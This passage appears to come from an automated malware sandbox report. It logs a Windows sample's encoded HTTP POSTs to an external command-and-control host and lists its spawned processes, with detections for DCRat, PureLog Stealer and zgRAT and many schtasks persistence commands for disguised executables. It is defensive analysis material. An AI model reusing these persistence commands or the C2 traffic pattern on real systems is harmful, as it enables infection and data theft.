                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            8192.168.2.449845172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:48:51.832592010 CET313OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:48:52.177519083 CET344OUTData Raw: 00 0b 04 03 03 08 04 07 05 06 02 01 02 07 01 0a 00 04 05 0f 02 04 03 0d 02 05 0e 07 04 54 03 04 0d 00 05 0c 03 0c 06 0a 0e 00 04 06 06 05 02 02 04 50 0d 0a 0e 00 01 07 04 50 04 02 07 0b 05 0b 02 56 0c 0b 06 06 07 51 0e 57 0d 57 0d 00 0e 56 06 04
                                                            Data Ascii: TPPVQWWVQ\L}S|cftqjYu`@|BiLcos^M`lRd[{fI|C^c^hL~e~V@AzmT}re
                                                            Dec 28, 2024 23:48:52.963706017 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:48:53.205905914 CET1033INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:48:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsl612QaSVc0G0dqc%2Fxjhqzrlfqeeub3rVcgAQdkB%2F84FGgzuDxD%2Fyhawyw%2BzryFH09q%2BA1fhwqvnqT6vyQmg1d6JavU%2Bd34CpdBTZYZDShTL%2Bt%2FIaMg9o7vMkBD2wftXZzHKXmySso%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9519b20ff14291-EWR
                                                            alt-svc: h2=":443"; ma=60
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3491&min_rtt=1726&rtt_var=4177&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=657&delivery_rate=92125&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            9192.168.2.449863172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:49:00.200450897 CET349OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:49:00.552496910 CET344OUTData Raw: 00 02 01 05 06 08 04 05 05 06 02 01 02 07 01 03 00 04 05 09 02 0d 03 00 02 56 0e 01 06 02 01 55 0d 0f 06 0a 00 51 07 52 0f 01 05 04 07 53 05 05 06 54 0e 0c 0c 0f 07 52 05 0e 05 01 06 57 05 0b 00 53 0c 0b 07 05 04 53 0b 0f 0f 00 0f 53 0e 56 05 0d
                                                            Data Ascii: VUQRSTRWSSSVPZR\L~|`Tvbr^vulhlyvlkXc`oRwxN~J}nwS`^`}u~V@Ax}TNbW
                                                            Dec 28, 2024 23:49:01.284025908 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:49:01.516635895 CET1029INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:49:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=95yMMf7ma3E42dD%2FBGaUArvuFurjVD00Kmh2Lc84eDpsM3ShOL904jZykdR8XW4eqskvOj5jc0oKjc7ngh%2BzIHQF9PpoO6aeb%2BUtlC49w2b4lg3SFiDELvcCnjhEevmPu5eIR17ra%2FQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9519e61834184d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6981&min_rtt=1515&rtt_var=11501&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=32265&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            10192.168.2.449883172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:49:09.141928911 CET366OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:49:09.490153074 CET344OUTData Raw: 05 02 04 00 06 08 01 0b 05 06 02 01 02 07 01 0a 00 07 05 0c 02 04 03 0b 02 00 0c 07 04 05 01 50 0a 04 07 59 01 54 06 50 0d 01 02 01 00 02 05 51 06 0b 0c 01 0a 03 07 05 06 00 03 00 05 52 00 00 05 07 0c 0b 00 07 06 06 0f 0f 0f 05 0c 05 0b 04 02 04
                                                            Data Ascii: PYTPQRUU\L~hYi[wb_bfoThRSLvot`lxUczciZ}cR`Y|iO~V@Azmf}r}
                                                            Dec 28, 2024 23:49:10.318157911 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:49:10.575022936 CET1030INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:49:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EzSfThgCKVTshNWhuA%2FIL5VmW6oMDdBw1fQ9hM9zx7e6IvM8Dzn0iEk6cQjIUOWv3HKCKSbHOJRXMI2XKbC2ODzGDdsjJ08RoJ6fcCBQGcv5oc0c%2BD%2BHpdnr%2FAATaOb5hno7k0%2BgVSE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f951a1e7efdc481-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3890&min_rtt=1502&rtt_var=5340&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=70835&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            11192.168.2.449892172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:49:12.404839993 CET349OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:49:12.755798101 CET344OUTData Raw: 05 07 01 06 03 0d 04 06 05 06 02 01 02 0d 01 00 00 07 05 0a 02 06 03 0a 02 03 0f 51 06 50 02 03 0d 05 06 5b 02 56 03 05 0e 0a 02 02 06 02 04 0f 07 05 0f 0c 0c 0e 07 01 06 53 07 06 07 07 00 0d 05 00 0a 0a 00 03 01 09 0f 03 0b 03 0f 03 0f 07 02 06
                                                            Data Ascii: QP[VSTRR\L~~sa\cqmbe^AklywltBMhx|d_o`rIkCxt_}e~V@xCfO}\y
                                                            Dec 28, 2024 23:49:13.536200047 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:49:13.777905941 CET1029INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:49:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7cn30SK6QwT3L4N1bHvSfemvPJDHwqCadhDh%2F5vTEbhHsPMGxYSt9rncXqGLuSOQT1%2FNtlyywGDdJFBm3TLtMtdsnpqJol%2BjUiFa90ivWNmKl7w1oSFd0mP93hsOUp0PR7bSr%2F1I7I%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f951a32ad957d08-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3286&min_rtt=1925&rtt_var=3444&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=113928&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:17:47:04
                                                            Start date:28/12/2024
                                                            Path:C:\Users\user\Desktop\EjS7Q5fFCE.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\EjS7Q5fFCE.exe"
                                                            Imagebase:0x420000
                                                            File size:2'009'852 bytes
                                                            MD5 hash:5FA3D2D795206F9981B7BD191C423D65
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1668240113.0000000006958000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1669422200.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1668710147.00000000052B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:17:47:05
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe"
                                                            Imagebase:0xf80000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:17:47:34
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\ComproviderComponentIntocommon\9j6CCih.bat" "
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:17:47:34
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:17:47:34
                                                            Start date:28/12/2024
                                                            Path:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\ComproviderComponentIntocommon/Portsessionsvc.exe"
                                                            Imagebase:0x760000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000000.1966174195.0000000000762000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 78%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:17:47:37
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:17:47:37
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:17:47:37
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 10 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:17:47:37
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline"
                                                            Imagebase:0x7ff605270000
                                                            File size:2'759'232 bytes
                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:17:47:37
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:17:47:37
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1F4.tmp" "c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP"
                                                            Imagebase:0x7ff7ca7c0000
                                                            File size:52'744 bytes
                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\dwm.exe'" /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 13 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:23
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:24
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
